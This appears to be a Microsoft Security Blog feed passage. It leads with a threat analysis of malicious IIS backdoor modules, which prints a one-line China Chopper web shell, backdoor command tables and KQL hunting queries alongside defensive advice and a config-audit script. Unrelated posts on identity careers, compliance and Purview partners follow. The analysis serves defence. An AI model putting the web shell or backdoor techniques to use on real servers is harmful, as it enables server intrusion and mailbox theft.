The newly created extension should then be mapped to the target application to complete the registration. Generally, there are several methods that can be used to map managed modules for legitimate purposes. In the attacks we observed, attackers used the following techniques to register malicious IIS extensions:

Register with the global assembly cache (GAC) PowerShell API: Every device with the Common Language Runtime (CLR) hosts a device-wide cache called the global assembly cache (GAC). The GAC stores assemblies specifically designated to be shared by several applications on the device. GacInstall() is a PowerShell-accessible API for adding assemblies to the global cache. Once installed, the module is available under the path %windir%\Microsoft.NET\assembly and is mapped to IIS (w3wp.exe) using appcmd.exe.

Figure 2. Attacker command using the GAC PowerShell API

Register using appcmd.exe: Appcmd.exe is the single command-line tool for managing IIS. All critical operations, such as adding or removing modules and handlers, can be performed with the utility. In this case, the attackers drop the malicious extension in the target application’s /bin folder and map it using the add module command.

Figure 3. Attacker command using appcmd.exe

Register using gacutil.exe: Gacutil.exe is a .NET GAC utility shipped with Visual Studio. The tool allows the user to view and manipulate the contents of the GAC, including installing new assemblies using the -I option.

Figure 4. Attacker command using gacutil.exe

Register using web.config: After dropping the module in the application’s /bin folder, attackers can also edit the web.config of the target application or the global config file, applicationHost.config, to register the module.

Figure 5. Malicious web.config entry

Upon successful registration, the module is visible inside the IIS manager application.

Figure 6. Installed module visible in the list

Attack flow using a custom IIS backdoor

Between January and May 2022, our IIS-related detections picked up an interesting campaign targeting Microsoft Exchange servers. Web shells were dropped in the path %ExchangeInstallPath%\FrontEnd\HttpProxy\owa\auth\ via the ProxyShell exploit.

After a period of doing reconnaissance, dumping credentials, and establishing a remote access method, the attackers installed a custom IIS backdoor called FinanceSvcModel.dll in the folder C:\inetpub\wwwroot\bin\. The backdoor had built-in capability to perform Exchange management operations, such as enumerating installed mailbox accounts and exporting mailboxes for exfiltration, as detailed below.  

Command runs

PowerShDLL toolkit, an open-source project to run PowerShell without invoking powershell.exe, was used to run remote commands. The attacker avoided invoking common living-off-the-land binaries (LOLBins), such as cmd.exe or powershell.exe in the context of the Exchange application pool (MSExchangeOWAAppPool) to evade related detection logic.

Figure 7. Using PowerShDLL to run remote commands

Credential access

The attackers enabled WDigest registry settings, which forced the system to use WDigest protocol for authentication, resulting in lsass.exe retaining a copy of the user’s plaintext password in memory. This change allowed the attackers to steal the actual password, not just the hash. Later, Mimikatz was run to dump local credentials and perform a DCSYNC attack.

Figure 8. Mimikatz usage

Remote access

The attackers used plink.exe, a command-line connection tool like SSH. The tool allowed the attackers to bypass network restrictions and remotely access the server through tunneled RDP traffic.

Figure 9. Bypassing network restrictions


The attacker invoked the IIS backdoor by sending a crafted POST request carrying an EX_TOKEN cookie. The module extracts the cookie value and initiates a mailbox export request with the supplied filter.

Figure 10. Attacker-generated POST request

The value decodes to: ep,06/21/2022,06/21/2022,C:\Windows\Web,Administrator, where ep is the command to initiate the mailbox export request with filters determining the start and end dates followed by the export path. The final command has the following syntax:

Figure 11. Attacker-generated mailbox export request

Figure 12. Mailbox export code snippet

The table below details all the commands found in the backdoor:

Command   Description
test      Attempts to load the Exchange Management Shell (EMS): Add-PSSnapin Microsoft.Exchange.Management.Powershell.SnapIn
box       Lists all UserPrincipalNames: foreach ($name in Get-Mailbox -ResultSize unlimited){ Write-Output $name.UserPrincipalName}
ep        Runs the New-MailboxExportRequest cmdlet with the supplied mailbox name, start and end date, and export path as filters
gep       Gets the task ID associated with the export request
ruh       Tampers with Exchange logs

Types of IIS backdoors

Reviewing the malicious managed (.NET) IIS extensions observed over the past year, we grouped these extensions based on various factors such as similar capabilities and sources of origin, as further detailed in the below sections. 

Web shell-based variants

Web shells like China Chopper have been widely used in numerous targeted attacks. As China Chopper’s usage increased over the years, so did the detections. As a result, the attackers evolved and added IIS module-based versions of these web shells that maintain the same functionality. The module uses the same eval() technique that the script version uses to run the code. While most antivirus solutions would detect the one-liner web shell, such as <%@page language=js%><%eval(request.item(<password>),"unsafe");%>, embedding the same code in an IIS module generates lower detection rates.

In the module version, the attacker-initiated POST request contains the code along with the arguments in parameters z1 and z2, like the script-based version.

Figure 13. China Chopper IIS module – version 1

Figure 14. Attacker-generated POST data – version 1

In a different version, the module has the backdoor logic hardcoded inside the DLL and only waits for parameters z1 and z2. The parameter kfaero carries the command, exposed as sequential letters from ‘A’ to ‘Q’.

Figure 15. China Chopper IIS module – version 2

The IIS module has capabilities similar to those of the script version, such as listing and creating directories, downloading and uploading files, running queries using SQL adaptors, and running commands. To run commands, the attacker-initiated POST request contains the command “M” along with the arguments.

Figure 16. An example of attacker-generated POST data – version 2

Antsword is another popular web shell widely used in various targeted attacks. Custom IIS modules inspired by the web shell’s code have been observed in the wild, with similar architecture and capabilities. Interesting new features of these malicious modules include fileless execution of C# code and remote access via a TCP socket connection.

Figure 17. Antsword IIS module code snippet

Based on the request, the module takes one of two code paths. For requests to /server-status, a socket connection is initiated using values from the custom header Lhposzrp.

Command                                        Description
FSoaij7_03Ip3QuzbIhvuilKIsoM9a48DTkvQKdwtKNA   Socket connection
8CDztbQb4fsQeU5AAuBs9OmRokoyFJ7F5Z             Close connection
31FKvk8VDcqZMA3iAq3944wjg                      Send data
TU_LDzOsv                                      Receive data

For any other URL, the module follows a China Chopper-style architecture of commands, ranging from “A” through “R”. The additional “R” command allows the attackers to run C# code reflectively.

Figure 18. Command “R” to invoke code reflectively

Open-source variants

GitHub projects on creating backdoors for IIS have been available for some time now. Though these are mostly shared to educate the red team community, threat actors have also taken an interest and lifted code from them. Using as an example a public project that has been actively leveraged by attackers, the original code includes the following capabilities:

Command      Implementation
cmd          Run command via cmd.exe /c
powershell   Run PowerShell via RunspaceFactory.CreateRunspace()
shellcode    Inject supplied shellcode into userinit.exe

In this case, the in-the-wild variants change the cookie names, keeping the rest of the code intact:

Figure 19. Side-by-side comparison of code from an open-source project (left) and code used by attackers (right)

On supplying a whoami command to the backdoor, the generated cookie has the following format:

Cookie: BDUSS=P6zUsk/1xJyW4PPufWsx5w==

The backdoor responds with an AES-encrypted blob wrapped in base64. The decoded output has the following format:

Figure 20. Decoded response from the server

IIS handlers

As mentioned earlier, IIS handlers have the same visibility as modules into the request pipeline. Handlers can be configured to respond to certain extensions or requests. To create a managed IIS handler, the code must implement the IHttpHandler interface. The IHttpHandler interface has one method and one property with the following signatures:

Figure 21. IIS handler skeleton

Handlers can be registered by directly editing the web.config file or using the appcmd utility. The handler config takes a few important fields like path, which specifies the URL or extensions the handler should respond to, and verb, which specifies the HTTP request type. In the example below, the handler only responds to image requests ending with a .gif extension:

Figure 22. Malicious web.config entry

The handler is visible in the IIS manager application once successfully installed:

Figure 23. Installed handler visible in the list

Most of the handlers analyzed were relatively simple, only including the capability to run commands:

Figure 24. IIS handler running commands via cmd.exe

Interestingly, the response Content-Type is set to image/gif or image/jpeg, which presents a default image when browsing the image URL with the output hidden in <pre> tags. A possible reason for this could be to bypass network inspection since image files are generally considered non-malicious and are filtered and identified based on extensions.

Credential stealers

This subset of modules monitors sign-in patterns in outgoing requests and dumps extracted credentials in an encrypted format. The stolen credentials allow the attackers to remain persistent in the environment, even if the primary backdoor is detected.  

The modules monitor for specific requests that indicate sign-in activity, such as the default /auth.owa URL of the OWA application. On inspecting the request, the module dumps the credentials to a .dat file. The contents are encrypted using XOR with a hardcoded value and wrapped with base64 encoding. The image below depicts a decoded sample output:

Figure 25. Sample decrypted entry

Figure 26. Backdoor looking for OWA sign-in URL

In another variant, the module looks for common placeholder variables for passing credentials used in different ASP.Net applications. The dumped credentials are AES encrypted and wrapped with Base64 encoding, located in %programdata%\log.txt.

Figure 27. Backdoor looking for common credential placeholder variables

Figure 28. Sample decrypted entry

Improving defenses against server compromise

As we expect to observe more attacks using IIS backdoors, organizations must follow security practices that help defend their servers.

Apply the latest security updates

Identify and remediate vulnerabilities or misconfigurations impacting servers. Deploy the latest security updates, especially for server components like Exchange as soon as they become available. Use Microsoft Defender Vulnerability Management to audit these servers regularly for vulnerabilities, misconfigurations, and suspicious activity.

Keep antivirus and other protections enabled

It’s critical to protect servers with Windows antivirus software and other security solutions like firewall protection and MFA. Turn on cloud-delivered protection and automatic sample submission in Microsoft Defender Antivirus to use artificial intelligence and machine learning to quickly identify and stop new and unknown threats. Use attack surface reduction rules to automatically block behaviors like credential theft and suspicious use of PsExec and Windows Management Instrumentation (WMI). Turn on tamper protection features to prevent attackers from stopping security services.

If you are worried that these security controls will affect performance or disrupt operations, engage with IT professionals to help determine the true impact of these settings. Security teams and IT professionals should collaborate on applying mitigations and appropriate settings.

Review sensitive roles and groups

Review highly privileged groups like Administrators, Remote Desktop Users, and Enterprise Admins. Attackers add accounts to these groups to gain a foothold on a server. Regularly review these groups for suspicious additions or removals. To identify Exchange-specific anomalies, review the list of users in sensitive roles such as Mailbox Import Export and Organization Management using the Get-ManagementRoleAssignment cmdlet in Exchange PowerShell.

Restrict access

Practice the principle of least-privilege and maintain good credential hygiene. Avoid the use of domain-wide, admin-level service accounts. Enforce strong randomized, just-in-time local administrator passwords and enable MFA. Use tools like Microsoft Defender for Identity’s Local Administrator Password Solution (LAPS).

Place access control list restrictions on virtual directories in IIS. Also, remove the presence of on-premises Exchange servers when only used for recipient management in Exchange Hybrid environments.

Prioritize alerts

The distinctive patterns of server compromise aid in detecting malicious behaviors and inform security operations teams so they can quickly respond to the initial stages of compromise. Pay attention to and immediately investigate alerts indicating suspicious activities on servers. Catching attacks in the exploratory phase, the period in which attackers spend several days exploring the environment after gaining access, is key. In general, prioritize alerts related to processes such as net.exe and cmd.exe originating from w3wp.exe.

Inspect config file and bin folder

Regularly inspect the web.config of your application and ApplicationHost.config to identify any suspicious additions, such as a handler for image files—which is suspicious in itself, if not outright malicious. Also, regularly scan installed paths like the application’s bin directory and the default GAC location. Regularly inspecting the list of installed modules using the appcmd.exe or gacutil.exe utilities is also advisable.
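The registration techniques described earlier (appcmd.exe, the GAC, and web.config edits), the image-extension handler entry from the handlers section, and the inspection advice in this section can be turned into a repeatable check. The following PowerShell is an added example, not code from the Microsoft post or the Microsoft 365 Defender team: it parses a web.config or applicationHost.config and reports managed handlers bound to image extensions and any managed module or handler that is not on an administrator-supplied baseline. The function name, the baseline list, and the sample configuration are constructed for this example.

```powershell
# Added example (not from the Microsoft post). Audits an IIS web.config or applicationHost.config
# for the registration patterns the post describes. The function name, baseline list and sample
# config are assumptions constructed for this example.
function Find-SuspiciousIisRegistrations {
    param(
        [Parameter(Mandatory)] [string] $ConfigPath,
        # Names of modules/handlers the administrator has already vetted (assumed baseline).
        [string[]] $ApprovedNames = @()
    )

    [xml] $cfg = Get-Content -LiteralPath $ConfigPath -Raw
    $imageExt  = '\.(gif|jpe?g|png|bmp|ico)$'   # handlers bound to these are called out in the post
    $findings  = New-Object System.Collections.Generic.List[object]

    # Integrated-pipeline handlers (system.webServer) plus classic-mode httpHandlers (system.web).
    $handlers = @($cfg.SelectNodes('//system.webServer/handlers/add')) +
                @($cfg.SelectNodes('//system.web/httpHandlers/add'))
    foreach ($h in $handlers) {
        # A 'type' attribute means a managed (.NET) handler; native handlers are out of scope here.
        if ([string]::IsNullOrEmpty($h.GetAttribute('type'))) { continue }
        $reasons = @()
        if ($h.GetAttribute('path') -match $imageExt) {
            $reasons += 'managed handler mapped to an image extension'
        }
        if ($h.GetAttribute('name') -notin $ApprovedNames) {
            $reasons += 'handler not in approved baseline'
        }
        if ($reasons.Count -gt 0) {
            $findings.Add([pscustomobject]@{
                Kind   = 'handler'
                Name   = $h.GetAttribute('name')
                Path   = $h.GetAttribute('path')
                Verb   = $h.GetAttribute('verb')
                Type   = $h.GetAttribute('type')
                Reason = ($reasons -join '; ')
            })
        }
    }

    $modules = @($cfg.SelectNodes('//system.webServer/modules/add')) +
               @($cfg.SelectNodes('//system.web/httpModules/add'))
    foreach ($m in $modules) {
        $typeName = $m.GetAttribute('type')
        if ([string]::IsNullOrEmpty($typeName)) { continue }          # native module, skip
        if ($m.GetAttribute('name') -in $ApprovedNames) { continue }
        # An unqualified type name is loaded from the application's /bin folder; an
        # assembly-qualified one (contains a comma) can also resolve from the GAC.
        $source = if ($typeName -match ',') { 'bin or GAC' } else { 'application /bin' }
        $findings.Add([pscustomobject]@{
            Kind   = 'module'
            Name   = $m.GetAttribute('name')
            Path   = ''
            Verb   = ''
            Type   = $typeName
            Reason = "managed module not in approved baseline (loads from $source)"
        })
    }
    return $findings
}

# Constructed sample config (not a real artifact): one unapproved managed module loaded from /bin
# and a managed handler bound to .gif requests, alongside two legitimate-looking entries.
$sample = @'
<?xml version="1.0" encoding="utf-8"?>
<configuration>
  <system.webServer>
    <modules>
      <add name="UriCacheModule" />
      <add name="SessionHelperModule" type="SessionHelper.Module" />
    </modules>
    <handlers>
      <add name="PageHandlerFactory-Integrated" path="*.aspx" verb="GET,HEAD,POST,DEBUG"
           type="System.Web.UI.PageHandlerFactory" preCondition="integratedMode" />
      <add name="ImageHandler" path="*.gif" verb="GET,POST" type="ImageHandler.Handler" />
    </handlers>
  </system.webServer>
</configuration>
'@
$tmp = Join-Path ([System.IO.Path]::GetTempPath()) 'audit-sample-web.config'
Set-Content -LiteralPath $tmp -Value $sample -Encoding UTF8
try {
    Find-SuspiciousIisRegistrations -ConfigPath $tmp -ApprovedNames @('PageHandlerFactory-Integrated') |
        Format-Table Kind, Name, Path, Type, Reason -AutoSize
} finally {
    Remove-Item -LiteralPath $tmp -ErrorAction SilentlyContinue
}
```

Run it against %windir%\System32\inetsrv\config\applicationHost.config and each application's web.config; the approved baseline should come from a known-good server rather than from the host being inspected.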

Hardik Suri
Microsoft 365 Defender Research Team


Microsoft Defender Antivirus detects these threats and related behaviors as the following malware:

  • Backdoor:MSIL/SuspIISModule.G!gen
  • Backdoor:MSIL/SuspIISModule.H!gen
  • Backdoor:MSIL/SuspIISModule.K!gen
  • Backdoor:MSIL/OWAStealer.B
  • Backdoor:MSIL/OWAStealer.C
  • Behavior:Win32/SuspGacInstall.B

Endpoint detection and response (EDR)

  • Suspicious IIS AppCmd Usage

Hunting queries

To locate malicious activity related to suspicious IIS module registration, run the following queries:

Suspicious IIS module registration

DeviceProcessEvents
| where ProcessCommandLine has "appcmd.exe add module"
| where InitiatingProcessParentFileName == "w3wp.exe"

DeviceProcessEvents
| where InitiatingProcessFileName == "powershell.exe"
| where ProcessCommandLine has " system.enterpriseservices.internal.publish"
| where InitiatingProcessParentFileName == "w3wp.exe"

DeviceProcessEvents
| where ProcessCommandLine has " \\gacutil.exe /I"
| where InitiatingProcessParentFileName == "w3wp.exe"

Indicators of compromise (IOCs)


The post Malicious IIS extensions quietly open persistent backdoors into servers appeared first on Microsoft Security Blog.

How one Microsoft product manager acts as champion for identity security

July 26th, 2022

A technology career embodies the ancient Roman saying that “luck happens when preparation meets opportunity.” Few industries are as dynamic, fast-paced, or intense as technology. With so many challenges to solve, opportunities are everywhere, but as I’ve learned myself through the years, the best opportunities are not just the ones right in front of you, they’re the ones you create.

Nitika Gupta, a Microsoft Principal Product Manager who leads the team responsible for enterprise admin capabilities for identity security, personifies the spirit of preparing for, seizing, and creating opportunities, which she has done not only for herself but also for the people around her. Since joining Microsoft in 2013, she has never stayed complacent. Nitika is always learning, growing, and honing her expertise in identity, product management, and leadership so she’ll be ready to take on the next big challenge.

So many game-changing technologies started with a napkin, sticky note, or whiteboard, but no great idea ever comes to fruition without a champion determined to steward it from concept to working feature. Nitika has championed some of our most groundbreaking technologies, including Conditional Access, the heart and soul of Microsoft’s Zero Trust architecture. Her hard work and optimism have made her a go-to person on my team for new initiatives. I feel so fortunate to work with Nitika, and I hope her story inspires you to prepare for, seize, and create opportunities in your own career.

Nitika’s interview with Microsoft Partner Director of Identity Security Alex Weinert has been edited for clarity and length. You’ll find a video snippet embedded in the interview so you can hear Nitika talk about her work philosophy.

Alex: Tell us, Nitika, how you got to Microsoft.

Nitika: I grew up in India in a small city. I did really well in school in general, but I did really well in computer science courses, too. Naturally, I picked computer science as I headed to college in Singapore.

My last year at the National University of Singapore, I spent most of my time applying to companies in the United States that would sponsor my work visa. Since I was studying computer engineering, and all my internships were coding, I applied as a developer. During my second interview with Microsoft, the interviewer told me about a new role called program manager, which is now called product manager.

They didn’t hire program managers from overseas as much back then—only developers. The gentleman who interviewed me put in a good word for me, so the program management team in Redmond decided to interview me.

We ended up doing phone calls at odd times because I was sitting in Singapore and the interviewers were in Redmond. They ended up giving me an offer to join Microsoft as a program manager in the identity team. I was like, “This is exactly what I want,” since I wanted to relocate to the United States. Program management was new but sounded cool and I told myself if I didn’t like it, I could go back to being a developer. I had no clue what identity was, but that’s how I ended up in identity at Microsoft.

Alex: Incredible. What was your first project as a new product manager at Microsoft?

Nitika: I worked on resiliency of Microsoft Azure Active Directory (Azure AD) services. I started with the core authentication stack, but I wanted to work on something more customer-facing, where I could talk to customers firsthand. My manager happily agreed, so I started working on multifactor authentication (MFA). That’s when I met you, Alex. I still remember the whiteboarding session we did on Conditional Access in your office, which we converted into mockups for a road show. We ended up building it, and now it’s the most used feature in Azure AD today.

Alex: Back then, I was responsible for Latin America, and we did a customer tour there. On the last day, you and I had a conversation. You said you wanted to do bigger things. And I challenged you to go figure out what problem you wanted to solve and just solve it. Can you talk a bit about that?

Nitika: Yeah. Back then, I was working on admin experiences for identity security and was really spread too thin. I had a broad scope but didn’t feel like I was owning a business. I remember writing down my thoughts about what I was doing, what I liked and didn’t. I came to you, we had a chat, and you challenged me to think about what “my ideal role” looked like. And that’s a question I now often use to challenge my team when they want to make a change because as a manager, I’m very committed to giving them opportunities that align best with their passions and interests.

In any event, I came up with security adoption.

Alex: You engaged the field, the small and medium-sized business (SMB) market. You found partner teams and went super creative in a very entrepreneurial way—all as an individual contributor. You created what is now security defaults and the identity secure score, as well as the big MFA adoption push. Then another opportunity came your way. Tell us about that.

Nitika: It was an opportunity I didn’t see coming. A lot of opportunities have come from getting to a point where I wanted more challenge, but in this case, I was having a blast, right? I got to create my own role. I was driving this mission for adoption of security best practices. I was very jazzed about it, and suddenly you and our leadership surprised me with an opportunity to drive a compete feature on the cloud provisioning team. My career in identity until that point had been about the cloud. Once you get your identities in the cloud, how can we help you protect those identities with MFA, Conditional Access, identity protection, and adoption of security best practices? But I had little knowledge of the on-premises world, and this new job was all about bringing identities from on-premises to the cloud.

So for me, it was a very tough decision because I felt like I did not have the expertise and the experience I would need. Other people had been working on sync and provisioning scenarios for years, so I needed to leverage their expertise to build the best possible product for our customers. We had this ambitious goal of delivering a preview in six months or so, which ended up being closer to a year. It was a fun journey working on a zero-to-one product where I had zero expertise to start with, but we still made it happen.

Alex: Then we tapped you on the shoulder again.

Nitika: When you and Alex Simons offered me the opportunity to lead the Conditional Access, MFA, and security adoption team, I said, “This is out of my league.” I was very unsure and took a few days to accept, even though it was a dream job for me. But thanks to the support from you and Alex, I ended up taking the opportunity. I started leading the team right when we all began working from home at the start of the pandemic. It’s been very gratifying to support the team in such uncertain times and yet deliver the business outcomes.

Alex: One of the things I love is the way it came full circle, from that whiteboard session where we were just kind of like, “Hey, wouldn’t it be cool if…,” to something that’s now the heart of our Zero Trust strategy at Microsoft. You’re leading a 15-person team in three regions as we’re making huge bets on supporting the Cybersecurity Executive Order from the United States government, phish-proof credentials, the protection of machine accounts, and MFA adoption. Watching you grow and become such a strong leader has been awesome.

Nitika: Thank you. It’s about protecting our customers. That gets me excited every day I come to work. And it’s really the team, right? Every day, I think it’s about making sure everyone on the team can do their best work and achieve their career goals.

Learn more

Learn more about Microsoft identity and access management.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post How one Microsoft product manager acts as champion for identity security appeared first on Microsoft Security Blog.

Discover 5 lessons Microsoft has learned about compliance management

July 25th, 2022

Compliance management is a complex process—one that gets increasingly more complicated the larger an organization grows. Microsoft knows this firsthand, not only because of our experience providing Security and Compliance solutions to customers but also because of the global reach and responsibility for maintaining compliance with a hefty number of regional and industry-specific regulations. Another thing Microsoft has learned along this journey is that the route is significantly smoother with an inclusive mindset and digital tools to ease the way.

In the new world of hybrid work, regulatory compliance has become a board-level directive. Local and global regulations dictate how to manage, store, and transmit data, making compliance more critical than ever before. However, to adhere to these regulatory standards, risks need to be identified and mitigated, and data needs to be governed according to policy. Embarking on this journey will provide additional valuable outcomes, like:

  • Providing you with fast access to requested data in the event of an external or internal investigation or legal action.
  • Protecting company data as the workplace evolves is especially important given the growing use of personal devices for work and the increase in employees accessing company networks from outside the physical office for some or most of their week.
  • Acting as good stewards—Chief Information Security Officers (CISOs) feel a sense of duty to protect their employees, partners, and customers to the best of their ability.

Microsoft’s compliance journey has given us insights and best practices that we can share with other organizations determined to strengthen their compliance management practices. Planning for the unexpected events that inevitably occur means aligning your people, processes, and technology. Here are five things we’ve learned along our compliance path—and stories of what’s worked for customers.

Assess your compliance posture

It’s difficult, if not impossible, to know if you’re headed in the right direction without knowing your current position. So, where do you start? Compliance management has gone from a nice-to-have to a must-have for organizations, which have a huge incentive to strengthen their compliance management practices. Keeping track of all the regulations they’re responsible for, however, can be challenging, especially for those companies in regulated industries, like financial services or healthcare. Maintaining a good compliance posture can help you avoid penalties, negative publicity, fines, and financial losses. Given how quickly regulations change, this can be a big challenge. And manually tracking compliance issues in spreadsheets often isn’t sufficient. As a first step, we recommend assessing the current state of your compliance with a visual tool that helps measure where you are today and allows you to track your collective progress over time.

Broaden your idea of compliance

When people hear the term “compliance,” many instantly think about regulatory compliance. Understandably so, because regulations like the California Consumer Protection Act (CCPA) and General Data Protection Regulation (GDPR) receive a lot of press and attention. But as mentioned earlier, compliance goes way beyond regulations.

Compliance management can even lead to innovation. Customers tell us they feel free to adapt the way they operate in response to customer trends. Visionary Wealth Advisors, a financial management firm in the United States, wanted to allow customers to communicate with the company via text messaging but needed to manage that data securely for compliance reasons. Visionary Wealth Advisors was able to maximize security and compliance with Microsoft Purview Data Lifecycle Management and CellTrust SL2.

“A central pain point is that the client doesn’t understand the regulatory environment that we operate in,” said Ryan Barke, Chief Compliance Officer and General Counsel, Visionary Wealth Advisors. “They just want to communicate with their financial advisor, and the financial advisor wants to communicate with the client. We can have a policy that says, advisors, you’re prohibited from text messaging with your clients, but we cannot control the other end of that communication.”

Involve everyone

Data breaches are accelerating—climbing 68 percent in 2021, costing an average of USD4.24 million each.1 Insider leaks of sensitive data, intellectual property (IP) theft, and fraud can all detrimentally impact a company. So, too, can regulatory violations, but CISOs may be so focused on data protection that data compliance doesn’t get as much attention. What we have learned on our journey is that compliance isn’t a CISO’s burden to bear alone. Multiple Microsoft executives were involved in meeting compliance regulations and obligations. People across Microsoft had to have a hand in compliance to drive the process.

Involving multiple leaders makes sense given how people throughout an organization will benefit from what strong compliance management makes possible. The City of Marion in Australia deployed Microsoft Purview Records Management to better manage the data collected from the 90 services it provides. As a result, city staff has become more engaged with the process of creating and handling information. They can organize themselves and their workflows in Microsoft Teams, set up SharePoint sites, create and link information, create their own Power BI reports, configure workflows, and connect varied information much easier.

“It helps our small team get lots of stuff done, and we don’t need to worry so much about compliance anymore,” said Karlheins Sohl, Information Management Team Leader, City of Marion. “We can trust the system to help take care of that, while we’re freed to focus on the quality of information and the service we provide to the City of Marion staff.”

Discover data and identify risks

In the event of legal action, a merger or acquisition, or an internal or external investigation, technology solutions can help you more efficiently find the relevant data you need. With the proliferation of data, that’s more important than ever.

The sheer volume of data can make this challenging. Technology solutions like Microsoft Purview eDiscovery can help you save time and money on tracking down data.

Through a solution like Microsoft Purview Communication Compliance, organizations can reduce risks related to regulatory compliance obligations.  

Simplify and automate compliance

Effective technology solutions have a wonderful way of simplifying complex processes—and often the workdays of those responsible for managing those processes. Multiple solution providers can complicate already challenging compliance processes and result in a fragmented, inefficient approach. Choosing a comprehensive solution, like Microsoft Purview, can help by continuously monitoring for compliance changes and automating the update process.

Texas-based Frost Bank must follow numerous banking regulations, and employees recognize the importance of complying with them—“Compliance is like drinking coffee in the morning,” says Edward Contreras, CISO, Frost Bank. Keeping up with all of those regulations proved challenging before adopting Microsoft Purview Compliance Manager, which updates daily, adding at least 200 updates from more than 1,000 regulatory bodies and enabling the bank to create detailed reports for regulators and auditors.

“Compliance Manager took the mystery out of regulatory compliance for us,” said Glenn McClellan, Endpoint Architect, Frost Bank. “The solution provides improvement actions, excerpts from relevant regulations, and overall, made managing compliance really easy and actionable.”

Explore Microsoft Purview

Effective compliance and risk management are extremely important, and are possible. Microsoft is here to help if you’re looking to simplify your compliance management with technology solutions.

Microsoft Purview is a comprehensive set of compliance and risk management solutions that help organizations govern, protect, and manage data, and improve your company’s risk and compliance posture. These solutions include Microsoft Purview eDiscovery, which helps you discover, preserve, collect, process, cull, and analyze your data in one place; Microsoft Purview Compliance Manager, which helps you simplify compliance and reduce risk; and Microsoft Purview Communication Compliance, which helps foster compliant communications across corporate mediums. We’d love to offer support on your journey.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

1Cost of a Data Breach Report 2021, Ponemon Institute, IBM. 2021.

The post Discover 5 lessons Microsoft has learned about compliance management appeared first on Microsoft Security Blog.

How Microsoft Purview and Priva support the partner ecosystem

July 20th, 2022

Today, many enterprise organizations are multicloud and multiplatform. Critical enterprise data is located across clouds and platforms, requiring security and compliance no matter where it lives. To solve the complexity that comes with these environments, organizations have invested in multiple point solutions, which in turn can make it hard for them to manage the fragmented compliance and risk posture covering their entire data estate. To help organizations meet today’s global compliance and risk requirements across their multicloud, multiplatform data environments, we announced Microsoft Purview in April 2022.

Three columns with text explaining that Microsoft Purview helps customers understand and govern data across their environment, safeguard their data across clouds, apps, and devices, and improve data risk and compliance posture with regulatory requirements.

Microsoft Purview is a portfolio of solutions for information protection, data governance, risk management, and compliance that enables organizations to effectively manage their data all from one place. It provides enhanced visibility that organizations can leverage across their environment to help close gaps that can lead to data exposure, simplify tasks through automation, stay up-to-date with regulatory requirements, and keep their most important asset—their data—secured. Partners play a critical role in helping customers manage their entire data estate. We’ve invested in connectors, APIs, and extensibility to support partners and help customers manage their data. 

Microsoft Purview product announcements

Today, we are excited to announce the general availability of the new Microsoft Graph APIs for Microsoft Purview eDiscovery. With the new Microsoft Purview eDiscovery APIs, organizations can leverage automation to streamline common, repetitive workflows that require a lot of manual effort in the product experience.

Customers and partners find automation and extensibility of eDiscovery workflows critically important because of the ability to reduce the potential for human error in highly sensitive workflows. For example, efficiently managing repeatable, defensible processes is critical to managing risk for organizations that have significant requirements for litigation and investigation.

Here are some of the ways partners are building value-added solutions and services using our Microsoft Purview eDiscovery APIs:

Relativity integrates with Microsoft Purview eDiscovery (Premium)

Relativity, Microsoft’s Security ISV of the Year for 2022, shared that “using the right tools to put business’s data into action is essential for many eDiscovery and compliance use cases. RelativityOne integration with Microsoft Purview eDiscovery significantly expedites the eDiscovery review process, minimizes data copies across multiple platforms, facilitates third-party collaboration, and ultimately reduces costs while the data remains secure within the Microsoft cloud. Now is the time to benefit from RelativityOne’s integration with Microsoft Purview’s eDiscovery platform,” said Chris Izsak, Strategic Partnerships GTM Manager, Relativity.

Relativity's RelOne user experience showing integration with Microsoft Purview eDiscovery.

BDO’s Athenagy integrates with Microsoft Purview eDiscovery

BDO’s Athenagy creates dashboards using both Microsoft Purview eDiscovery and RelativityOne. Their “patent-pending business intelligence dashboards now provide legal, IT, and compliance professionals a whole new level of data transparency and cost containment by surfacing up critical insights inside both Microsoft Purview eDiscovery—using the newly released Microsoft Purview eDiscovery APIs—and RelativityOne tied to legal hold, collect, preservation, processing, and review for every investigation, compliance, and litigation matter,” said Daniel Gold, inventor of Athenagy and managing director of E-Discovery Managed Services, BDO.

Athenagy's user experience showing data from Microsoft Purview eDiscovery.

Epiq Global integrates with Microsoft Purview eDiscovery

Epiq leverages Microsoft Purview eDiscovery APIs to create an end-to-end eDiscovery workflow. “Utilizing the Microsoft Purview eDiscovery APIs allows us to automate within Microsoft Purview to use inputs from our customer’s existing legal hold system of record to seamlessly orchestrate an end-to-end workflow including sending hold notices, preserving data in place, and performing searches, collections, and exports. When updates are made in the system of record, the changes are propagated directly to the appropriate piece of eDiscovery to ensure parity. An automated solution eliminates human error, reduces administrative costs, and ensures that eDiscovery processes are in sync with your issuance of legal holds,” said Jon Kessler, Vice President of Information Governance Services, Epiq.

Lighthouse integrates with Microsoft Purview eDiscovery

Lighthouse uses Microsoft Purview eDiscovery APIs to create “a rich and intuitive user experience, taking advantage of custodian data mapping, in-place preservation, modern attachment retrieval, and advanced culling. Our automation and orchestration solution is designed to improve user efficacy with job failure oversight, completion notification, and automatic provisioning and management of Azure storage containers. Clients embracing this solution benefit from automation and orchestration to fully leverage Purview Premium eDiscovery’s apps securely and at scale,” said John Collins, Director of Advisory Services, Lighthouse (winner of the Compliance and Privacy Trailblazer award for 2022).

Growth opportunities for partners

The opportunity for our partners who invest in the Microsoft compliance ecosystem continues to grow. Our partners are finding success by building value-added solutions and services around Microsoft’s solutions at an increasing rate. For example, partners are creating solutions that connect disparate information repositories for enterprise-wide compliance initiatives.

Microsoft partners continue to have the ability to participate in our successful go-to-market program, the partner build-intent workshops. These workshops cover the Microsoft Security portfolio and help drive customer success with Microsoft products and partner services through prescriptive scenarios that address the top pain points of our customers. These workshops have been updated to give partners the ability to uncover additional opportunities leveraging the most up-to-date tools and solutions. Discover all our partner workshops and get started with unlocking opportunities and value with your customers.

How Microsoft supports the partner ecosystem

The Microsoft Purview platform enables our customers and partners to adapt, extend, integrate, and automate information protection, data governance, risk management, and compliance scenarios. These capabilities are enabled through our investments in these key building blocks:

